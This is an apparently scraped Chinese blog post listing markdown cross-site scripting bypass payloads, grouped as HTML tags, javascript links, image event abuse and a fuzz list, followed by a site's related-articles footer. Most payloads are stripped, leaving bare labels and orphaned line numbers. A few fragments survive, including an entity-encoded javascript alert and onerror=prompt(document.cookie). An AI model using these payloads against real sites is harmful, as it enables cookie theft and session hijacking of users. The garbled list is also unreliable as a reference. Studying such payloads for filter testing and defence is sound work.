【XSS】markdown xss

简介: 【XSS】markdown xss

【XSS】markdown xss
HTML 标签
Javascript链接
Img事件语法滥用
Markdown XSS Fuzz测试
如果你有机会在 markdown 中注入代码,有几种选项可以用来触发 XSS

HTML 标签
在 markdown 中触发 XSS 的最常见方法是注入执行 javascript 的常见 HTML 标签,因为 markdown 解释器也会接受 HTML内容:



1
2
Javascript链接
如果HTML标签不可用,你可以尝试使用markdown语法,如下是一些bypass payload:

a)
Basic)
Local Storage))
CaseInsensitive)
URL)
In Quotes')
a)
a
a
1
2
3
4
5
6
7
8
9
Img事件语法滥用
Uh oh...)
Uh oh...)
Escape SRC - onload)
Escape SRC - onerror)
1
2
3
4
Markdown XSS Fuzz测试
a)
a)
a)\


<&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
a\
a
a
a'"`onerror=prompt(document.cookie) \

notmalicious
test)
test;com)
notmalicious
notmalicious
a
clickme)
http://danlec@.1 style=background-image:url();background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);//
>
text
a)
a
a
a
a
a
a
a)
a;com)
a
a
a)
a')
a)
a)
a)
/http://<?php\<\h1>confirm(2)
XSS;)

.]])
a
XSS)
XSS)
XSS
XSS

XSS
XSS)
XSS;com)
XSS
XSS
XSS
XSS)
XSS)
XSS
XSS
XSS
XSS
XSS
XSS
XSS)
XSS;com)
XSS
XSS
XSS)\
XSS\
XSS'"`onerror=prompt(document.cookie) \

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
文章知识点与官方知识档案匹配,可进一步学习相关知识
CS入门技能树MarkDown入门MarkDown介绍42442 人正在系统学习中
————————————————

                        版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

原文链接:https://blog.csdn.net/Gherbirthday0916/article/details/138603821

目录
相关文章
|
JavaScript 前端开发 安全
前端实践:如何防止xss跨站脚本攻击(vue代码说明)
XSS(跨站脚本)攻击是一种常见的网络安全漏洞,攻击者通过在网页中注入恶意脚本代码,从而实现窃取用户信息、盗取会话令牌等攻击目的。为了防止XSS攻击,我们可以采取以下措施:
7038 0
前端实践:如何防止xss跨站脚本攻击(vue代码说明)
|
4月前
|
存储 安全 JavaScript
【XSS】XSS漏洞详细指南
【XSS】XSS漏洞详细指南
153 3
|
5月前
|
存储 JavaScript API
跨站脚本(XSS)
【8月更文挑战第17天】
38 3
|
5月前
|
JavaScript 前端开发
常见XSS绕过技巧
常见XSS绕过技巧
262 0
|
8月前
|
JavaScript 安全 前端开发
|
Web App开发 JavaScript 前端开发
详探XSS PayIoad
1.Cookie劫持 一个最常见的XSS Payload,就是通过读取浏览器的Cookie对象,从而发起“Cookie劫持”攻击 Cookie中一般加密保存了当前用户的登录凭证。Cookie如果丢失,往往意味着用户的登录凭证丢失。换句话说,攻击者可以不通过密码,而直接登录进用户的账户
207 1
详探XSS PayIoad
|
Web App开发 JavaScript 前端开发
细读 JS | XSS、CSRF 浅谈
细读 JS | XSS、CSRF 浅谈
174 0
|
安全 JavaScript 前端开发
XSS 是什么
XSS 是什么
170 0
|
Web App开发 JavaScript 前端开发
|
Web App开发 JavaScript 安全